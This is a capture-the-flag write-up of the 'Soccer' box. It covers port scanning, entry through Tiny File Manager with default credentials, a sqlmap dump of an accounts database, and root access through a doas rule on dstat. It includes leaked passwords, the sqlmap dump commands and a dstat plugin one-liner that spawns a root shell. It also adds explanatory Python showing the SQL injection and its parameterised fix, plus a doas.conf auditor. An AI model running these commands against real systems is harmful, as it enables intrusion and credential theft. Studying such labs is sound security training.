CTF Soccer

Rustscan

rustscan -a soccer.htb

Output:

PORT     STATE SERVICE        REASON
22/tcp   open  ssh            syn-ack
80/tcp   open  http           syn-ack
9091/tcp open  xmltec-xmlmail syn-ack

Port 9091

Port 80

Gobuster

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.soccer.htb" -u http://soccer.htb 

Output:

/index.html           (Status: 200) [Size: 6917]
/.html                (Status: 403) [Size: 162]
/tiny                 (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]


I found an RCE.
https://raw.githubusercontent.com/febinrev/tinyfilemanager-2.4.3-exploit/main/exploit.sh
Let’s follow the example…

And it’s the right password, but the exploit is not working.

User: admin
Password: admin@123

Reverse shell

Upgrade the shell

python3 -c 'import pty;pty.spawn("/bin/bash")' 
export TERM=xterm # allow clear command

Then Ctrl + Z.

stty raw -echo; fg # allow auto completion

lse.sh

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/local/bin/doas
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst080 Can we read subdirectories under /home?......................... yes!

/etc/passwd

lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
player:x:1001:1001::/home/player:/bin/bash
mysql:x:113:121:MySQL Server,,,:/nonexistent:/bin/false
_laurel:x:997:997::/var/log/laurel:/bin/false

LinPEAS

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560

Potentially Vulnerable to CVE-2022-2588

╔══════════╣ Checking doas.conf
permit nopass player as root cmd /usr/bin/dstat


cat /etc/nginx/sites-enabled/*

Output:

# We already know this one
server_name soccer.htb;


server_name soc-player.soccer.htb;
root /root/app/views;

I need to add soc-player.soccer.htb to my /etc/hosts.
It’s another website, interesting.
The web root is in /root/app/views; maybe I can become root with this one.

I’ve created an account.


I have the ticket number 85240.
It’s using this script to connect:

<script>
    var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
    window.onload = function () {

        var btn = document.getElementById('btn');
        var input = document.getElementById('id');

        ws.onopen = function (e) {
            console.log('connected to the server')
        }
        input.addEventListener('keypress', (e) => {
            keyOne(e)
        });

        function keyOne(e) {
            e.stopPropagation();
            if (e.keyCode === 13) {
                e.preventDefault();
                sendText();
            }
        }

        function sendText() {
            var msg = input.value;
            if (msg.length > 0) {
                ws.send(JSON.stringify({
                    "id": msg
                }))
            }
            else append("????????")
        }
    }

    ws.onmessage = function (e) {
        append(e.data)
    }

    function append(msg) {
        let p = document.querySelector("p");
        // let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
        // p.style.color = randomColor;
        p.textContent = msg
    }
</script>

var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
It’s not working over HTTP; the ticket lookup goes through a WebSocket.

sqlmap -u "http://localhost:8081/?id=1" -p "id" --dbs --dbms=mysql

sqlmap -u "http://localhost:8081/?id=1" -p "id" -D soccer_db --tables --dbms=mysql

sqlmap -u "http://localhost:8081/?id=1" -p "id" -D soccer_db -T accounts --dump --dbms=mysql

User: player
Password: doas -u root /usr/bin/dstat –cyberw1ng
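The page shows only the client side of the ticket check: sendText() ships {"id": msg} over the WebSocket and the server answers with a lookup result. The server code for soc-player is not on the page, so the following is an added Python model (not the box's application and not the writeup's code) of what such a handler looks like when it splices the id field into SQL, next to the hardened form that validates the field and uses a parameterised query. It runs offline on an in-memory SQLite table whose rows are constructed here; the table, column names and ticket values are assumptions. The point it shows is why sqlmap could dump the whole accounts table: a boolean condition in the id field makes the vulnerable handler return every row, while the hardened handler returns nothing for the same message.

```python
import json
import sqlite3

# Constructed sample data (assumption, not the real soccer_db contents):
# one row per ticket, mirroring the kind of table the writeup dumps.
SAMPLE_ROWS = [
    (85240, "alice", "alice@example.test"),
    (85241, "bob", "bob@example.test"),
    (85242, "carol", "carol@example.test"),
]


def make_db():
    """Create an in-memory accounts table seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, message):
    """Hypothetical handler: the WebSocket 'id' field is concatenated into SQL."""
    ticket = json.loads(message)["id"]
    sql = "SELECT id, username, email FROM accounts WHERE id = " + str(ticket)
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, message):
    """Same lookup, but the field must be a plain number and is bound as a parameter."""
    ticket = json.loads(message)["id"]
    if not isinstance(ticket, str) or not ticket.isdigit():
        return []  # anything that is not a bare ticket number is rejected (and worth logging)
    sql = "SELECT id, username, email FROM accounts WHERE id = ?"
    return conn.execute(sql, (int(ticket),)).fetchall()


def demo():
    """Send the same two client messages to both handlers and return the results."""
    conn = make_db()
    # Exactly what the page's sendText() emits: JSON.stringify({"id": msg})
    normal = json.dumps({"id": "85240"})
    # A boolean condition in place of a ticket number (the classic sqlmap probe)
    probe = json.dumps({"id": "0 OR 1=1"})
    return {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_probe": lookup_vulnerable(conn, probe),
        "hard_normal": lookup_hardened(conn, normal),
        "hard_probe": lookup_hardened(conn, probe),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable handler returns one row for a real ticket and all three for the probe; the hardened one returns the single row and an empty result respectively. On a real server the rejected branch is also the natural place to log the offending message, since a legitimate client never sends anything but digits in that field.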

SSH

Escalation

As we saw with LinPEAS, we can run this as root:

doas /usr/bin/dstat

https://gtfobins.github.io/gtfobins/dstat/
dstat allows you to run arbitrary python scripts loaded as “external plugins” if they are located in one of the directories stated in the dstat man page under “FILES”:

echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_xxx.py
doas -u root /usr/bin/dstat --xxx
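The doas rule looks restrictive because it names a single command, yet the GTFOBins entry above explains why it is not: dstat executes whatever plugin file sits in its plugin directory. The following Python audit is an added example (not part of the writeup or of doas) that parses doas.conf rules and flags exactly that pattern: password-less rules targeting root, rules with no cmd at all, and rules whose command is one of a caller-supplied set of binaries known to load code from a directory. The PLUGIN_LOADERS table and the sample configuration are constructed assumptions; the first sample line is the rule LinPEAS reported on the box, the other two are invented for contrast. setenv { ... } options are not modelled.

```python
import shlex

# doas.conf(5) rule shape: permit|deny [options] identity [as target] [cmd command [args ...]]
DOAS_OPTIONS = {"nopass", "nolog", "persist", "keepenv"}

# Assumption for this illustration (not a list from the page or from doas):
# binaries that execute code found on disk at run time, so restricting a rule
# to them still allows whatever lands in that directory. dstat's external
# plugin directory is the one the GTFOBins entry describes.
PLUGIN_LOADERS = {"/usr/bin/dstat": "/usr/local/share/dstat"}


def parse_doas_conf(text):
    """Parse doas.conf text into rule dicts (comments and blank lines skipped)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = shlex.split(line)
        if tokens[0] not in ("permit", "deny"):
            raise ValueError("unexpected rule: " + line)
        rule = {"action": tokens[0], "options": set(), "identity": None,
                "target": None, "cmd": None, "args": None}
        i = 1
        while i < len(tokens) and tokens[i] in DOAS_OPTIONS:
            rule["options"].add(tokens[i])
            i += 1
        rule["identity"] = tokens[i]  # user, or :group
        i += 1
        if i < len(tokens) and tokens[i] == "as":
            rule["target"] = tokens[i + 1]
            i += 2
        if i < len(tokens) and tokens[i] == "cmd":
            rule["cmd"] = tokens[i + 1]
            i += 2
            if i < len(tokens) and tokens[i] == "args":
                rule["args"] = tokens[i + 1:]
        rules.append(rule)
    return rules


def audit_doas_conf(text):
    """Return findings for permit rules that grant more than they appear to."""
    findings = []
    for rule in parse_doas_conf(text):
        if rule["action"] != "permit":
            continue
        who = rule["identity"]
        target = rule["target"] or "any user"  # no 'as' clause: any target user
        what = rule["cmd"] or "any command"
        if "nopass" in rule["options"] and target in ("any user", "root"):
            findings.append(f"{who}: runs {what} as root without a password")
        if rule["cmd"] is None:
            findings.append(f"{who}: unrestricted command as {target}")
        elif rule["cmd"] in PLUGIN_LOADERS:
            plugin_dir = PLUGIN_LOADERS[rule["cmd"]]
            findings.append(f"{who}: {rule['cmd']} loads plugins from {plugin_dir}; "
                            f"the cmd restriction does not contain it")
    return findings


# Constructed sample configuration (assumption): the box's rule plus two
# invented rules for contrast.
SAMPLE_CONF = """\
# constructed doas.conf
permit nopass player as root cmd /usr/bin/dstat
permit persist alice as root cmd /usr/bin/systemctl args restart nginx
permit :wheel
"""

if __name__ == "__main__":
    for finding in audit_doas_conf(SAMPLE_CONF):
        print(finding)
```

For the box's rule the audit reports two findings: a password-less root rule, and a command that loads plugins from /usr/local/share/dstat, which is the pair that together makes the escalation above possible. The fix on the host side is either to drop nopass and the rule, or to make sure the plugin directory is root-owned and not writable by the permitted user.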